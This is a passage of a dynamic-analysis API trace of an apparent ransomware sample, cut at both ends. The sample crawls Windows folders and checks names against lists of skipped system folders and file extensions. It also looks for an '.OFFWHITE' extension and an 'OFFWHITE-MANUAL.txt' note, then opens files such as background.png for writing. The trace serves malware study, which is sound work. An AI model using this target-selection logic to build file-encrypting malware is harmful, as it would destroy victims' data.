lpString2="program files (x86)") returned -1 [0143.988] lstrcpyW (in: lpString1=0x295dae8, lpString2="C:/Users\\All Users\\Microsoft\\Crypto\\DSS\\" | out: lpString1="C:/Users\\All Users\\Microsoft\\Crypto\\DSS\\") returned="C:/Users\\All Users\\Microsoft\\Crypto\\DSS\\" [0143.988] lstrcatW (in: lpString1="C:/Users\\All Users\\Microsoft\\Crypto\\DSS\\", lpString2="MachineKeys" | out: lpString1="C:/Users\\All Users\\Microsoft\\Crypto\\DSS\\MachineKeys") returned="C:/Users\\All Users\\Microsoft\\Crypto\\DSS\\MachineKeys" [0143.988] lstrcatW (in: lpString1="C:/Users\\All Users\\Microsoft\\Crypto\\DSS\\MachineKeys", lpString2="\\" | out: lpString1="C:/Users\\All Users\\Microsoft\\Crypto\\DSS\\MachineKeys\\") returned="C:/Users\\All Users\\Microsoft\\Crypto\\DSS\\MachineKeys\\" [0143.988] lstrcpyW (in: lpString1=0x295d670, lpString2="C:/Users\\All Users\\Microsoft\\Crypto\\DSS\\MachineKeys\\" | out: lpString1="C:/Users\\All Users\\Microsoft\\Crypto\\DSS\\MachineKeys\\") returned="C:/Users\\All Users\\Microsoft\\Crypto\\DSS\\MachineKeys\\" [0143.988] lstrcatW (in: lpString1="C:/Users\\All Users\\Microsoft\\Crypto\\DSS\\MachineKeys\\", lpString2="*.*" | out: lpString1="C:/Users\\All Users\\Microsoft\\Crypto\\DSS\\MachineKeys\\*.*") returned="C:/Users\\All Users\\Microsoft\\Crypto\\DSS\\MachineKeys\\*.*" [0143.988] FindFirstFileW (in: lpFileName="C:/Users\\All Users\\Microsoft\\Crypto\\DSS\\MachineKeys\\*.*", lpFindFileData=0x295d218 | out: lpFindFileData=0x295d218*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xfd943744, ftCreationTime.dwHighDateTime=0x1ca0431, ftLastAccessTime.dwLowDateTime=0xfd943744, ftLastAccessTime.dwHighDateTime=0x1ca0431, ftLastWriteTime.dwLowDateTime=0xb66d81ea, ftLastWriteTime.dwHighDateTime=0x1ca042b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x580056, dwReserved1=0x295dcf0, cFileName=".", cAlternateFileName="")) returned 0x544750 [0143.988] lstrcmpiW (lpString1=".", lpString2=".") returned 0 [0143.989] FindNextFileW (in: hFindFile=0x544750, lpFindFileData=0x295d218 | out: lpFindFileData=0x295d218*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xfd943744, ftCreationTime.dwHighDateTime=0x1ca0431, ftLastAccessTime.dwLowDateTime=0xfd943744, ftLastAccessTime.dwHighDateTime=0x1ca0431, ftLastWriteTime.dwLowDateTime=0xb66d81ea, ftLastWriteTime.dwHighDateTime=0x1ca042b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x580056, dwReserved1=0x295dcf0, cFileName="..", cAlternateFileName="")) returned 1 [0143.989] lstrcmpiW (lpString1="..", lpString2=".") returned 1 [0143.989] lstrcmpiW (lpString1="..", lpString2="..") returned 0 [0143.989] FindNextFileW (in: hFindFile=0x544750, lpFindFileData=0x295d218 | out: lpFindFileData=0x295d218*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xfd943744, ftCreationTime.dwHighDateTime=0x1ca0431, ftLastAccessTime.dwLowDateTime=0xfd943744, ftLastAccessTime.dwHighDateTime=0x1ca0431, ftLastWriteTime.dwLowDateTime=0xb66d81ea, ftLastWriteTime.dwHighDateTime=0x1ca042b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x580056, dwReserved1=0x295dcf0, cFileName="..", cAlternateFileName="")) returned 0 [0143.989] FindClose (in: hFindFile=0x544750 | out: hFindFile=0x544750) returned 1 [0143.989] FindNextFileW (in: hFindFile=0x544590, lpFindFileData=0x295d898 | out: lpFindFileData=0x295d898*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xfd943744, ftCreationTime.dwHighDateTime=0x1ca0431, ftLastAccessTime.dwLowDateTime=0xfd943744, ftLastAccessTime.dwHighDateTime=0x1ca0431, ftLastWriteTime.dwLowDateTime=0xb66d81ea, ftLastWriteTime.dwHighDateTime=0x1ca042b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x50004e, dwReserved1=0x295e370, cFileName="MachineKeys", cAlternateFileName="MACHIN~1")) returned 0 [0143.989] FindClose (in: hFindFile=0x544590 | out: hFindFile=0x544590) returned 1 [0143.989] FindNextFileW (in: hFindFile=0x544650, lpFindFileData=0x295df18 | out: lpFindFileData=0x295df18*(dwFileAttributes=0x14, ftCreationTime.dwLowDateTime=0xfd96989e, ftCreationTime.dwHighDateTime=0x1ca0431, ftLastAccessTime.dwLowDateTime=0xfd96989e, ftLastAccessTime.dwHighDateTime=0x1ca0431, ftLastWriteTime.dwLowDateTime=0xb66d81ea, ftLastWriteTime.dwHighDateTime=0x1ca042b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x420040, dwReserved1=0x295e9f0, cFileName="Keys", cAlternateFileName="")) returned 1 [0143.989] lstrcmpiW (lpString1="Keys", lpString2=".") returned 1 [0143.989] lstrcmpiW (lpString1="Keys", lpString2="..") returned 1 [0143.989] lstrcmpiW (lpString1="Keys", lpString2="...") returned 1 [0143.989] lstrcmpiW (lpString1="Keys", lpString2="windows") returned -1 [0143.989] lstrcmpiW (lpString1="Keys", lpString2="$recycle.bin") returned 1 [0143.989] lstrcmpiW (lpString1="Keys", lpString2="rsa") returned -1 [0143.990] lstrcmpiW (lpString1="Keys", lpString2="ntuser.dat") returned -1 [0143.990] lstrcmpiW (lpString1="Keys", lpString2="programdata") returned -1 [0143.990] lstrcmpiW (lpString1="Keys", lpString2="appdata") returned 1 [0143.990] lstrcmpiW (lpString1="Keys", lpString2="program files") returned -1 [0143.990] lstrcmpiW (lpString1="Keys", lpString2="program files (x86)") returned -1 [0143.990] lstrcpyW (in: lpString1=0x295e168, lpString2="C:/Users\\All Users\\Microsoft\\Crypto\\" | out: lpString1="C:/Users\\All Users\\Microsoft\\Crypto\\") returned="C:/Users\\All Users\\Microsoft\\Crypto\\" [0143.990] lstrcatW (in: lpString1="C:/Users\\All Users\\Microsoft\\Crypto\\", lpString2="Keys" | out: lpString1="C:/Users\\All Users\\Microsoft\\Crypto\\Keys") returned="C:/Users\\All Users\\Microsoft\\Crypto\\Keys" [0143.990] lstrcatW (in: lpString1="C:/Users\\All Users\\Microsoft\\Crypto\\Keys", lpString2="\\" | out: lpString1="C:/Users\\All Users\\Microsoft\\Crypto\\Keys\\") returned="C:/Users\\All Users\\Microsoft\\Crypto\\Keys\\" [0143.990] lstrcpyW (in: lpString1=0x295dcf0, lpString2="C:/Users\\All Users\\Microsoft\\Crypto\\Keys\\" | out: lpString1="C:/Users\\All Users\\Microsoft\\Crypto\\Keys\\") returned="C:/Users\\All Users\\Microsoft\\Crypto\\Keys\\" [0143.990] lstrcatW (in: lpString1="C:/Users\\All Users\\Microsoft\\Crypto\\Keys\\", lpString2="*.*" | out: lpString1="C:/Users\\All Users\\Microsoft\\Crypto\\Keys\\*.*") returned="C:/Users\\All Users\\Microsoft\\Crypto\\Keys\\*.*" [0143.990] FindFirstFileW (in: lpFileName="C:/Users\\All Users\\Microsoft\\Crypto\\Keys\\*.*", lpFindFileData=0x295d898 | out: lpFindFileData=0x295d898*(dwFileAttributes=0x14, ftCreationTime.dwLowDateTime=0xfd96989e, ftCreationTime.dwHighDateTime=0x1ca0431, ftLastAccessTime.dwLowDateTime=0xfd96989e, ftLastAccessTime.dwHighDateTime=0x1ca0431, ftLastWriteTime.dwLowDateTime=0xb66d81ea, ftLastWriteTime.dwHighDateTime=0x1ca042b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x50004e, dwReserved1=0x295e370, cFileName=".", cAlternateFileName="")) returned 0x544590 [0143.996] lstrcmpiW (lpString1=".", lpString2=".") returned 0 [0143.996] FindNextFileW (in: hFindFile=0x544590, lpFindFileData=0x295d898 | out: lpFindFileData=0x295d898*(dwFileAttributes=0x14, ftCreationTime.dwLowDateTime=0xfd96989e, ftCreationTime.dwHighDateTime=0x1ca0431, ftLastAccessTime.dwLowDateTime=0xfd96989e, ftLastAccessTime.dwHighDateTime=0x1ca0431, ftLastWriteTime.dwLowDateTime=0xb66d81ea, ftLastWriteTime.dwHighDateTime=0x1ca042b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x50004e, dwReserved1=0x295e370, cFileName="..", cAlternateFileName="")) returned 1 [0143.996] lstrcmpiW (lpString1="..", lpString2=".") returned 1 [0143.996] lstrcmpiW (lpString1="..", lpString2="..") returned 0 [0143.996] FindNextFileW (in: hFindFile=0x544590, lpFindFileData=0x295d898 | out: lpFindFileData=0x295d898*(dwFileAttributes=0x14, ftCreationTime.dwLowDateTime=0xfd96989e, ftCreationTime.dwHighDateTime=0x1ca0431, ftLastAccessTime.dwLowDateTime=0xfd96989e, ftLastAccessTime.dwHighDateTime=0x1ca0431, ftLastWriteTime.dwLowDateTime=0xb66d81ea, ftLastWriteTime.dwHighDateTime=0x1ca042b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x50004e, dwReserved1=0x295e370, cFileName="..", cAlternateFileName="")) returned 0 [0143.997] FindClose (in: hFindFile=0x544590 | out: hFindFile=0x544590) returned 1 [0143.997] FindNextFileW (in: hFindFile=0x544650, lpFindFileData=0x295df18 | out: lpFindFileData=0x295df18*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0xfd96989e, ftCreationTime.dwHighDateTime=0x1ca0431, ftLastAccessTime.dwLowDateTime=0xfc65d150, ftLastAccessTime.dwHighDateTime=0x1d2dda1, ftLastWriteTime.dwLowDateTime=0xfc65d150, ftLastWriteTime.dwHighDateTime=0x1d2dda1, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x420040, dwReserved1=0x295e9f0, cFileName="RSA", cAlternateFileName="")) returned 1 [0143.997] lstrcmpiW (lpString1="RSA", lpString2=".") returned 1 [0143.997] lstrcmpiW (lpString1="RSA", lpString2="..") returned 1 [0143.997] lstrcmpiW (lpString1="RSA", lpString2="...") returned 1 [0143.997] lstrcmpiW (lpString1="RSA", lpString2="windows") returned -1 [0143.997] lstrcmpiW (lpString1="RSA", lpString2="$recycle.bin") returned 1 [0143.997] lstrcmpiW (lpString1="RSA", lpString2="rsa") returned 0 [0143.997] FindNextFileW (in: hFindFile=0x544650, lpFindFileData=0x295df18 | out: lpFindFileData=0x295df18*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0xfd96989e, ftCreationTime.dwHighDateTime=0x1ca0431, ftLastAccessTime.dwLowDateTime=0xfc65d150, ftLastAccessTime.dwHighDateTime=0x1d2dda1, ftLastWriteTime.dwLowDateTime=0xfc65d150, ftLastWriteTime.dwHighDateTime=0x1d2dda1, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x420040, dwReserved1=0x295e9f0, cFileName="RSA", cAlternateFileName="")) returned 0 [0143.997] FindClose (in: hFindFile=0x544650 | out: hFindFile=0x544650) returned 1 [0143.997] FindNextFileW (in: hFindFile=0x544610, lpFindFileData=0x295e598 | out: lpFindFileData=0x295e598*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0xfd96989e, ftCreationTime.dwHighDateTime=0x1ca0431, ftLastAccessTime.dwLowDateTime=0xfd96989e, ftLastAccessTime.dwHighDateTime=0x1ca0431, ftLastWriteTime.dwLowDateTime=0xfd96989e, ftLastWriteTime.dwHighDateTime=0x1ca0431, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x2e002c, dwReserved1=0x295f070, cFileName="Device Stage", cAlternateFileName="DEVICE~1")) returned 1 [0143.997] lstrcmpiW (lpString1="Device Stage", lpString2=".") returned 1 [0143.997] lstrcmpiW (lpString1="Device Stage", lpString2="..") returned 1 [0143.997] lstrcmpiW (lpString1="Device Stage", lpString2="...") returned 1 [0143.998] lstrcmpiW (lpString1="Device Stage", lpString2="windows") returned -1 [0143.998] lstrcmpiW (lpString1="Device Stage", lpString2="$recycle.bin") returned 1 [0143.998] lstrcmpiW (lpString1="Device Stage", lpString2="rsa") returned -1 [0143.998] lstrcmpiW (lpString1="Device Stage", lpString2="ntuser.dat") returned -1 [0143.998] lstrcmpiW (lpString1="Device Stage", lpString2="programdata") returned -1 [0143.998] lstrcmpiW (lpString1="Device Stage", lpString2="appdata") returned 1 [0143.998] lstrcmpiW (lpString1="Device Stage", lpString2="program files") returned -1 [0143.998] lstrcmpiW (lpString1="Device Stage", lpString2="program files (x86)") returned -1 [0143.998] lstrcpyW (in: lpString1=0x295e7e8, lpString2="C:/Users\\All Users\\Microsoft\\" | out: lpString1="C:/Users\\All Users\\Microsoft\\") returned="C:/Users\\All Users\\Microsoft\\" [0143.998] lstrcatW (in: lpString1="C:/Users\\All Users\\Microsoft\\", lpString2="Device Stage" | out: lpString1="C:/Users\\All Users\\Microsoft\\Device Stage") returned="C:/Users\\All Users\\Microsoft\\Device Stage" [0143.998] lstrcatW (in: lpString1="C:/Users\\All Users\\Microsoft\\Device Stage", lpString2="\\" | out: lpString1="C:/Users\\All Users\\Microsoft\\Device Stage\\") returned="C:/Users\\All Users\\Microsoft\\Device Stage\\" [0143.998] lstrcpyW (in: lpString1=0x295e370, lpString2="C:/Users\\All Users\\Microsoft\\Device Stage\\" | out: lpString1="C:/Users\\All Users\\Microsoft\\Device Stage\\") returned="C:/Users\\All Users\\Microsoft\\Device Stage\\" [0143.998] lstrcatW (in: lpString1="C:/Users\\All Users\\Microsoft\\Device Stage\\", lpString2="*.*" | out: lpString1="C:/Users\\All Users\\Microsoft\\Device Stage\\*.*") returned="C:/Users\\All Users\\Microsoft\\Device Stage\\*.*" [0143.998] FindFirstFileW (in: lpFileName="C:/Users\\All Users\\Microsoft\\Device Stage\\*.*", lpFindFileData=0x295df18 | out: lpFindFileData=0x295df18*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0xfd96989e, ftCreationTime.dwHighDateTime=0x1ca0431, ftLastAccessTime.dwLowDateTime=0xfd96989e, ftLastAccessTime.dwHighDateTime=0x1ca0431, ftLastWriteTime.dwLowDateTime=0xfd96989e, ftLastWriteTime.dwHighDateTime=0x1ca0431, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x420040, dwReserved1=0x295e9f0, cFileName=".", cAlternateFileName="")) returned 0x544650 [0143.999] lstrcmpiW (lpString1=".", lpString2=".") returned 0 [0143.999] FindNextFileW (in: hFindFile=0x544650, lpFindFileData=0x295df18 | out: lpFindFileData=0x295df18*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0xfd96989e, ftCreationTime.dwHighDateTime=0x1ca0431, ftLastAccessTime.dwLowDateTime=0xfd96989e, ftLastAccessTime.dwHighDateTime=0x1ca0431, ftLastWriteTime.dwLowDateTime=0xfd96989e, ftLastWriteTime.dwHighDateTime=0x1ca0431, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x420040, dwReserved1=0x295e9f0, cFileName="..", cAlternateFileName="")) returned 1 [0143.999] lstrcmpiW (lpString1="..", lpString2=".") returned 1 [0143.999] lstrcmpiW (lpString1="..", lpString2="..") returned 0 [0143.999] FindNextFileW (in: hFindFile=0x544650, lpFindFileData=0x295df18 | out: lpFindFileData=0x295df18*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0xfd96989e, ftCreationTime.dwHighDateTime=0x1ca0431, ftLastAccessTime.dwLowDateTime=0xfd96989e, ftLastAccessTime.dwHighDateTime=0x1ca0431, ftLastWriteTime.dwLowDateTime=0xfd96989e, ftLastWriteTime.dwHighDateTime=0x1ca0431, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x420040, dwReserved1=0x295e9f0, cFileName="Device", cAlternateFileName="")) returned 1 [0143.999] lstrcmpiW (lpString1="Device", lpString2=".") returned 1 [0143.999] lstrcmpiW (lpString1="Device", lpString2="..") returned 1 [0143.999] lstrcmpiW (lpString1="Device", lpString2="...") returned 1 [0143.999] lstrcmpiW (lpString1="Device", lpString2="windows") returned -1 [0143.999] lstrcmpiW (lpString1="Device", lpString2="$recycle.bin") returned 1 [0143.999] lstrcmpiW (lpString1="Device", lpString2="rsa") returned -1 [0143.999] lstrcmpiW (lpString1="Device", lpString2="ntuser.dat") returned -1 [0143.999] lstrcmpiW (lpString1="Device", lpString2="programdata") returned -1 [0143.999] lstrcmpiW (lpString1="Device", lpString2="appdata") returned 1 [0143.999] lstrcmpiW (lpString1="Device", lpString2="program files") returned -1 [0143.999] lstrcmpiW (lpString1="Device", lpString2="program files (x86)") returned -1 [0143.999] lstrcpyW (in: lpString1=0x295e168, lpString2="C:/Users\\All Users\\Microsoft\\Device Stage\\" | out: lpString1="C:/Users\\All Users\\Microsoft\\Device Stage\\") returned="C:/Users\\All Users\\Microsoft\\Device Stage\\" [0143.999] lstrcatW (in: lpString1="C:/Users\\All Users\\Microsoft\\Device Stage\\", lpString2="Device" | out: lpString1="C:/Users\\All Users\\Microsoft\\Device Stage\\Device") returned="C:/Users\\All Users\\Microsoft\\Device Stage\\Device" [0143.999] lstrcatW (in: lpString1="C:/Users\\All Users\\Microsoft\\Device Stage\\Device", lpString2="\\" | out: lpString1="C:/Users\\All Users\\Microsoft\\Device Stage\\Device\\") returned="C:/Users\\All Users\\Microsoft\\Device Stage\\Device\\" [0143.999] lstrcpyW (in: lpString1=0x295dcf0, lpString2="C:/Users\\All Users\\Microsoft\\Device Stage\\Device\\" | out: lpString1="C:/Users\\All Users\\Microsoft\\Device Stage\\Device\\") returned="C:/Users\\All Users\\Microsoft\\Device Stage\\Device\\" [0143.999] lstrcatW (in: lpString1="C:/Users\\All Users\\Microsoft\\Device Stage\\Device\\", lpString2="*.*" | out: lpString1="C:/Users\\All Users\\Microsoft\\Device Stage\\Device\\*.*") returned="C:/Users\\All Users\\Microsoft\\Device Stage\\Device\\*.*" [0143.999] FindFirstFileW (in: lpFileName="C:/Users\\All Users\\Microsoft\\Device Stage\\Device\\*.*", lpFindFileData=0x295d898 | out: lpFindFileData=0x295d898*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0xfd96989e, ftCreationTime.dwHighDateTime=0x1ca0431, ftLastAccessTime.dwLowDateTime=0xfd96989e, ftLastAccessTime.dwHighDateTime=0x1ca0431, ftLastWriteTime.dwLowDateTime=0xfd96989e, ftLastWriteTime.dwHighDateTime=0x1ca0431, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x5c005a, dwReserved1=0x295e370, cFileName=".", cAlternateFileName="")) returned 0x544590 [0144.009] lstrcmpiW (lpString1=".", lpString2=".") returned 0 [0144.009] FindNextFileW (in: hFindFile=0x544590, lpFindFileData=0x295d898 | out: lpFindFileData=0x295d898*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0xfd96989e, ftCreationTime.dwHighDateTime=0x1ca0431, ftLastAccessTime.dwLowDateTime=0xfd96989e, ftLastAccessTime.dwHighDateTime=0x1ca0431, ftLastWriteTime.dwLowDateTime=0xfd96989e, ftLastWriteTime.dwHighDateTime=0x1ca0431, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x5c005a, dwReserved1=0x295e370, cFileName="..", cAlternateFileName="")) returned 1 [0144.009] lstrcmpiW (lpString1="..", lpString2=".") returned 1 [0144.009] lstrcmpiW (lpString1="..", lpString2="..") returned 0 [0144.009] FindNextFileW (in: hFindFile=0x544590, lpFindFileData=0x295d898 | out: lpFindFileData=0x295d898*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xfd96989e, ftCreationTime.dwHighDateTime=0x1ca0431, ftLastAccessTime.dwLowDateTime=0xfd96989e, ftLastAccessTime.dwHighDateTime=0x1ca0431, ftLastWriteTime.dwLowDateTime=0xfd96989e, ftLastWriteTime.dwHighDateTime=0x1ca0431, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x5c005a, dwReserved1=0x295e370, cFileName="{113527a4-45d4-4b6f-b567-97838f1b04b0}", cAlternateFileName="{11352~1")) returned 1 [0144.009] lstrcmpiW (lpString1="{113527a4-45d4-4b6f-b567-97838f1b04b0}", lpString2=".") returned 1 [0144.009] lstrcmpiW (lpString1="{113527a4-45d4-4b6f-b567-97838f1b04b0}", lpString2="..") returned 1 [0144.009] lstrcmpiW (lpString1="{113527a4-45d4-4b6f-b567-97838f1b04b0}", lpString2="...") returned 1 [0144.009] lstrcmpiW (lpString1="{113527a4-45d4-4b6f-b567-97838f1b04b0}", lpString2="windows") returned -1 [0144.009] lstrcmpiW (lpString1="{113527a4-45d4-4b6f-b567-97838f1b04b0}", lpString2="$recycle.bin") returned 1 [0144.009] lstrcmpiW (lpString1="{113527a4-45d4-4b6f-b567-97838f1b04b0}", lpString2="rsa") returned -1 [0144.009] lstrcmpiW (lpString1="{113527a4-45d4-4b6f-b567-97838f1b04b0}", lpString2="ntuser.dat") returned -1 [0144.009] lstrcmpiW (lpString1="{113527a4-45d4-4b6f-b567-97838f1b04b0}", lpString2="programdata") returned -1 [0144.010] lstrcmpiW (lpString1="{113527a4-45d4-4b6f-b567-97838f1b04b0}", lpString2="appdata") returned -1 [0144.010] lstrcmpiW (lpString1="{113527a4-45d4-4b6f-b567-97838f1b04b0}", lpString2="program files") returned -1 [0144.010] lstrcmpiW (lpString1="{113527a4-45d4-4b6f-b567-97838f1b04b0}", lpString2="program files (x86)") returned -1 [0144.010] lstrcpyW (in: lpString1=0x295dae8, lpString2="C:/Users\\All Users\\Microsoft\\Device Stage\\Device\\" | out: lpString1="C:/Users\\All Users\\Microsoft\\Device Stage\\Device\\") returned="C:/Users\\All Users\\Microsoft\\Device Stage\\Device\\" [0144.010] lstrcatW (in: lpString1="C:/Users\\All Users\\Microsoft\\Device Stage\\Device\\", lpString2="{113527a4-45d4-4b6f-b567-97838f1b04b0}" | out: lpString1="C:/Users\\All Users\\Microsoft\\Device Stage\\Device\\{113527a4-45d4-4b6f-b567-97838f1b04b0}") returned="C:/Users\\All Users\\Microsoft\\Device Stage\\Device\\{113527a4-45d4-4b6f-b567-97838f1b04b0}" [0144.010] lstrcatW (in: lpString1="C:/Users\\All Users\\Microsoft\\Device Stage\\Device\\{113527a4-45d4-4b6f-b567-97838f1b04b0}", lpString2="\\" | out: lpString1="C:/Users\\All Users\\Microsoft\\Device Stage\\Device\\{113527a4-45d4-4b6f-b567-97838f1b04b0}\\") returned="C:/Users\\All Users\\Microsoft\\Device Stage\\Device\\{113527a4-45d4-4b6f-b567-97838f1b04b0}\\" [0144.010] lstrcpyW (in: lpString1=0x295d670, lpString2="C:/Users\\All Users\\Microsoft\\Device Stage\\Device\\{113527a4-45d4-4b6f-b567-97838f1b04b0}\\" | out: lpString1="C:/Users\\All Users\\Microsoft\\Device Stage\\Device\\{113527a4-45d4-4b6f-b567-97838f1b04b0}\\") returned="C:/Users\\All Users\\Microsoft\\Device Stage\\Device\\{113527a4-45d4-4b6f-b567-97838f1b04b0}\\" [0144.010] lstrcatW (in: lpString1="C:/Users\\All Users\\Microsoft\\Device Stage\\Device\\{113527a4-45d4-4b6f-b567-97838f1b04b0}\\", lpString2="*.*" | out: lpString1="C:/Users\\All Users\\Microsoft\\Device Stage\\Device\\{113527a4-45d4-4b6f-b567-97838f1b04b0}\\*.*") returned="C:/Users\\All Users\\Microsoft\\Device Stage\\Device\\{113527a4-45d4-4b6f-b567-97838f1b04b0}\\*.*" [0144.010] FindFirstFileW (in: lpFileName="C:/Users\\All Users\\Microsoft\\Device Stage\\Device\\{113527a4-45d4-4b6f-b567-97838f1b04b0}\\*.*", lpFindFileData=0x295d218 | out: lpFindFileData=0x295d218*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xfd96989e, ftCreationTime.dwHighDateTime=0x1ca0431, ftLastAccessTime.dwLowDateTime=0xfd96989e, ftLastAccessTime.dwHighDateTime=0x1ca0431, ftLastWriteTime.dwLowDateTime=0xfd96989e, ftLastWriteTime.dwHighDateTime=0x1ca0431, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x6a0068, dwReserved1=0x295dcf0, cFileName=".", cAlternateFileName="")) returned 0x544750 [0144.015] lstrcmpiW (lpString1=".", lpString2=".") returned 0 [0144.015] FindNextFileW (in: hFindFile=0x544750, lpFindFileData=0x295d218 | out: lpFindFileData=0x295d218*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xfd96989e, ftCreationTime.dwHighDateTime=0x1ca0431, ftLastAccessTime.dwLowDateTime=0xfd96989e, ftLastAccessTime.dwHighDateTime=0x1ca0431, ftLastWriteTime.dwLowDateTime=0xfd96989e, ftLastWriteTime.dwHighDateTime=0x1ca0431, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x6a0068, dwReserved1=0x295dcf0, cFileName="..", cAlternateFileName="")) returned 1 [0144.015] lstrcmpiW (lpString1="..", lpString2=".") returned 1 [0144.015] lstrcmpiW (lpString1="..", lpString2="..") returned 0 [0144.015] FindNextFileW (in: hFindFile=0x544750, lpFindFileData=0x295d218 | out: lpFindFileData=0x295d218*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x5f07a66f, ftCreationTime.dwHighDateTime=0x1ca040c, ftLastAccessTime.dwLowDateTime=0x5f07a66f, ftLastAccessTime.dwHighDateTime=0x1ca040c, ftLastWriteTime.dwLowDateTime=0xc76b3ce5, ftLastWriteTime.dwHighDateTime=0x1c9ea0e, nFileSizeHigh=0x0, nFileSizeLow=0x1fad1, dwReserved0=0x6a0068, dwReserved1=0x295dcf0, cFileName="background.png", cAlternateFileName="")) returned 1 [0144.015] lstrcmpiW (lpString1="background.png", lpString2=".") returned 1 [0144.015] lstrcmpiW (lpString1="background.png", lpString2="..") returned 1 [0144.015] lstrcmpiW (lpString1="background.png", lpString2="...") returned 1 [0144.015] lstrcmpiW (lpString1="background.png", lpString2="windows") returned -1 [0144.015] lstrcmpiW (lpString1="background.png", lpString2="$recycle.bin") returned 1 [0144.015] lstrcmpiW (lpString1="background.png", lpString2="rsa") returned -1 [0144.015] lstrcmpiW (lpString1="background.png", lpString2="ntuser.dat") returned -1 [0144.015] lstrcmpiW (lpString1="background.png", lpString2="programdata") returned -1 [0144.015] lstrcmpiW (lpString1="background.png", lpString2="appdata") returned 1 [0144.015] lstrcmpiW (lpString1="background.png", lpString2="program files") returned -1 [0144.015] lstrcmpiW (lpString1="background.png", lpString2="program files (x86)") returned -1 [0144.015] lstrcpyW (in: lpString1=0x295d468, lpString2="C:/Users\\All Users\\Microsoft\\Device Stage\\Device\\{113527a4-45d4-4b6f-b567-97838f1b04b0}\\" | out: lpString1="C:/Users\\All Users\\Microsoft\\Device Stage\\Device\\{113527a4-45d4-4b6f-b567-97838f1b04b0}\\") returned="C:/Users\\All Users\\Microsoft\\Device Stage\\Device\\{113527a4-45d4-4b6f-b567-97838f1b04b0}\\" [0144.016] lstrcatW (in: lpString1="C:/Users\\All Users\\Microsoft\\Device Stage\\Device\\{113527a4-45d4-4b6f-b567-97838f1b04b0}\\", lpString2="background.png" | out: lpString1="C:/Users\\All Users\\Microsoft\\Device Stage\\Device\\{113527a4-45d4-4b6f-b567-97838f1b04b0}\\background.png") returned="C:/Users\\All Users\\Microsoft\\Device Stage\\Device\\{113527a4-45d4-4b6f-b567-97838f1b04b0}\\background.png" [0144.016] lstrcmpiW (lpString1="arsdsr.exe", lpString2="KERNEL32.DLL") returned -1 [0144.016] lstrcmpiW (lpString1="kernel32.dll", lpString2="KERNEL32.DLL") returned 0 [0144.016] PathFindExtensionW (pszPath="background.png") returned=".png" [0144.016] lstrcmpiW (lpString1=".png", lpString2=".exe") returned 1 [0144.016] lstrcmpiW (lpString1=".png", lpString2=".log") returned 1 [0144.016] lstrcmpiW (lpString1=".png", lpString2=".cab") returned 1 [0144.016] lstrcmpiW (lpString1=".png", lpString2=".cmd") returned 1 [0144.016] lstrcmpiW (lpString1=".png", lpString2=".com") returned 1 [0144.016] lstrcmpiW (lpString1=".png", lpString2=".cpl") returned 1 [0144.016] lstrcmpiW (lpString1=".png", lpString2=".ini") returned 1 [0144.016] lstrcmpiW (lpString1=".png", lpString2=".dll") returned 1 [0144.016] lstrcmpiW (lpString1=".png", lpString2=".url") returned -1 [0144.016] lstrcmpiW (lpString1=".png", lpString2=".ttf") returned -1 [0144.016] lstrcmpiW (lpString1=".png", lpString2=".mp3") returned 1 [0144.016] lstrcmpiW (lpString1=".png", lpString2=".pif") returned 1 [0144.016] lstrcmpiW (lpString1=".png", lpString2=".mp4") returned 1 [0144.016] lstrcmpiW (lpString1=".png", lpString2=".OFFWHITE") returned 1 [0144.016] lstrcmpiW (lpString1=".png", lpString2=".msi") returned 1 [0144.016] lstrcmpiW (lpString1="background.png", lpString2="OFFWHITE-MANUAL.txt") returned -1 [0144.016] GetProcessHeap () returned 0x500000 [0144.016] RtlAllocateHeap (HeapHandle=0x500000, Flags=0x0, Size=0x8) returned 0x522280 [0144.016] CreateFileW (lpFileName="C:/Users\\All Users\\Microsoft\\Device Stage\\Device\\{113527a4-45d4-4b6f-b567-97838f1b04b0}\\background.png" (normalized: "c:\\users\\all users\\microsoft\\device stage\\device\\{113527a4-45d4-4b6f-b567-97838f1b04b0}\\background.png"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xffffffff [0144.017] GetFileSizeEx (in: hFile=0xffffffff, lpFileSize=0x295d1e0 | out: lpFileSize=0x295d1e0*=-4251594172) returned 0 [0144.017] GetProcessHeap () returned 